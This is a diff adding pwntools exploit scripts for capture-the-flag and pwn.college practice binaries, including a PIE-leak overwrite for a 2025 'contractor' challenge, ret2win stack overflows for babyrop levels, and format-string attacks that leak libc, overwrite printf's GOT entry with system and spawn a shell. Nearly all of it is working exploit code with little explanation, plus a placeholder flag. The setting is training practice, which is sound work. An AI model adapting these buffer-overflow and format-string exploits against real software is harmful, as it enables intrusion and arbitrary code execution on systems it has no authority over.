binary

cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/a.py

@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./contractor", checksec=False)
+
+while True:
+	r = process()
+
+	# funcs
+	s = lambda a,b: r.sendafter(a, b)
+	sl = lambda a,b: r.sendlineafter(a, b)
+	fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
+	opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
+
+	# leak
+	fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
+	r.recvuntil(b"C"*8)
+	target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
+	log.info("pie: %#x", target.address)
+
+	# write
+	opt(b"4", b"A"*28+p32(0)+b"\x40")
+	sl(b"> ", b"no")
+	opt(b"4", p64(target.sym.contract))
+	
+	r.recvuntil(b"lad!\n\n")
+
+	try:
+		r.sendline(b"id")
+		if r.recvline():
+			break
+	except EOFError:
+		pass
+
+r.interactive()

cyberapocalypse_ctf_2025_tales_from_eldoria/contractor/flag.txt

@@ -0,0 +1 @@
+HTB{f4k3_fl4g_f0r_t35t1ng}

pwn_college/babyrop_level_1.0/a.py

@@ -0,0 +1,20 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0
+"""
+
+context.binary = target = ELF("./babyrop_level_1_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*120
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_1.1/a.py

@@ -0,0 +1,16 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_1_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*136
+buf += p64(target.sym.win)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_2.0/a.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_2_0
+"""
+
+context.binary = target = ELF("./babyrop_level_2_0", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*104
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()

pwn_college/babyrop_level_2.1/a.py

@@ -0,0 +1,17 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_2_1", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*88
+buf += p64(target.sym.win_stage_1)
+buf += p64(target.sym.win_stage_2)
+s(buf)
+
+r.interactive()

random_challs/echoooo/a.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python3
+
+from pwn import *
+import re
+
+context.binary = target = ELF("./chal", checksec=False)
+libc = target.libc
+
+# bruteforce lower 12 bits
+def brute():
+	for a in range(1, 256):
+		for b in range(8, 256, 16):
+			r = process()
+			partial_ret = (a << 8) | b
+			write = (0x61 - (partial_ret & 0xff)) & 0xff
+			buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+			buf += f"%{write}c%48$hhn".encode()
+			r.sendlineafter(b": ", buf)
+			try:
+				r.recvuntil(b"Type")
+				return r, partial_ret
+			except:
+				r.kill()
+				continue
+
+# leak
+r, partial_ret = brute()
+log.info("ret: %#x", partial_ret)
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+r.sendlineafter(b": ", buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+log.info("libc: %#x", libc.address)
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = int(hex(libc.sym.system)[-4:], 16)
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+r.sendline(b"/bin/sh")
+
+r.interactive()
+
+"""
+# write
+partial_ret = 0xe068
+write = (0x61 - (partial_ret & 0xff)) & 0xff
+buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
+buf += f'%{write}c%48$hhn'.encode()
+s(buf)
+
+# leak
+buf = f"%97c%48$hhn".encode()
+buf += b"AAAA%17$p.%19$p"
+s(buf)
+r.recvuntil(b"AAAA")
+leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
+libc.address = int(leaks[0], 16) - 0x29d68
+target.address = int(leaks[1], 16) - 0x1169 
+log.info("elf: %#x", target.address)
+
+# write
+partial_ret = 0x38f0
+buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
+r.sendline(buf)
+"""

random_challs/hide/a.py

@@ -0,0 +1,14 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./hide", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+s(b"%160c%hhn%6$s")
+
+r.interactive()